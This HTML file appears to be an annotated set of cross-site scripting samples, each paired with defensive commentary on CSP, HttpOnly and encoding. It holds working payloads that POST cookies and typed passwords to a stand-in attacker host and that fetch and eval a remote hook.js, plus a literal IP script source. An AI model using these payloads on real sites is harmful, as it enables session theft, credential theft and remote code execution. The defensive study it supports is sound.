<!-- Sample: inline script element that shows document.cookie in an alert box.
     Cookies set with the HttpOnly attribute are not exposed through document.cookie.
     A Content-Security-Policy without 'unsafe-inline' stops an injected inline script
     from running; contextual output encoding keeps the markup from being parsed as
     an element in the first place. -->
<script>alert(document.cookie)</script>
<!-- Sample: the same cookie alert carried by an event-handler attribute instead of a
     script element. src=x presumably fails to load, which is what fires onerror.
     Filters that strip only script tags do not cover this form; a CSP without
     'unsafe-inline' blocks inline event handlers as well as inline scripts. -->
<img src=x onerror=alert(document.cookie)>
<!-- Sample: posts document.cookie, wrapped in a JSON object, to a third-party origin.
     mode "no-cors" means the browser sends the request without the receiver opting in
     through CORS, and the response is opaque to the page.
     Defender view: HttpOnly keeps session cookies out of document.cookie; a CSP
     connect-src allow-list blocks the fetch destination; unexpected cross-origin POSTs
     from a page are a detection signal in proxy logs and CSP violation reports. -->
<script>
fetch("https://evil-website.com", {
method: "POST",
mode: "no-cors",
body: JSON.stringify({ cookie: document.cookie }),
});
</script>
<!-- Sample: two injected form fields. The password field's onchange handler posts
     "username:password" to a third-party origin with mode 'no-cors'.
     `if(this.value.length);` ends in an empty statement, so the fetch that follows
     is not conditional on it. `username` inside the handler is resolved by the
     browser's named-element lookup for id="username".
     Defender view: HttpOnly cookies do not help here, because the data is typed by
     the user. The relevant controls are output encoding at the injection point,
     a CSP without 'unsafe-inline' (blocks the handler) and connect-src (blocks the
     destination). -->
<input name="username" id="username" />
<input
name="password"
id="password"
type="password"
onchange="if(this.value.length); fetch('https://evil-website.com',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});"
/>
<!-- Sample: script element whose src was supplied by the injection.
     As written, the value has no scheme or leading slashes, so a browser resolves it
     as a relative URL against the current page rather than as a host address.
     Defender view: a CSP script-src allow-list restricts where script elements may
     load from; the literal address is usable as a search term in stored content and
     request logs. -->
<script src="47.106.10.108"></script>
<!-- Sample: body onload handler that downloads hook.js over plain HTTP and passes the
     response text to eval(). The attribute value ends at the closing quote on the
     eval line; the .catch(...) line that follows lies outside the handler.
     Defender view: a CSP without 'unsafe-inline' blocks the handler, without
     'unsafe-eval' it blocks eval(), and connect-src limits the fetch destination.
     On an HTTPS page the http:// request is also subject to mixed-content blocking. -->
<body
onload="fetch('http://evil-website.com:3000/hook.js')
.then(response => response.text())
.then(script => eval(script))"
.catch(error => console.error('Error:', error));
>
<!-- Sample: the same fetch-then-eval loader, written with function expressions
     instead of arrow functions. The host here is the bare name `evilwebsite`
     (no TLD), unlike the other samples on this page.
     Defender view: the same controls apply. CSP without 'unsafe-inline' and
     'unsafe-eval', a connect-src allow-list, and output encoding at the injection
     point. -->
<body
onload="
fetch('http://evilwebsite:3000/hook.js')
.then(function(response) {
return response.text();
})
.then(function(script) {
eval(script);
})
"
>
<!-- Sample: the loader using XMLHttpRequest rather than fetch. The response text is
     passed to eval() only when readyState is 4 and status is 200.
     Defender view: signatures keyed on "fetch(" miss this variant. CSP connect-src
     governs XMLHttpRequest too, and eval() still requires 'unsafe-eval'. -->
<body
onload="
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://evil-website.com:3000/hook.js', true);
xhr.onreadystatechange = function () {
if (xhr.readyState == 4 && xhr.status == 200)
eval(xhr.responseText);
};
xhr.send();
"
>
<br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />
<!-- Sample: iframe that frames a page with a reflected parameter. The xss-parameter
     token in the URL is a placeholder; the URL-encoded value decodes to a body
     element carrying an onresize="print()" handler. The iframe's own onload sets its
     width and height to 0, which resizes the framed document.
     Defender view: the framed site can refuse framing with CSP frame-ancestors or
     X-Frame-Options, and must encode the reflected parameter on output. -->
<iframe
src="https://vulnerable-website.com/?<xss-parameter>=<%3Cbody%20onresize=%22print()%22%3E>"
onload="this.style.width='0'; this.style.height='0'"
></iframe>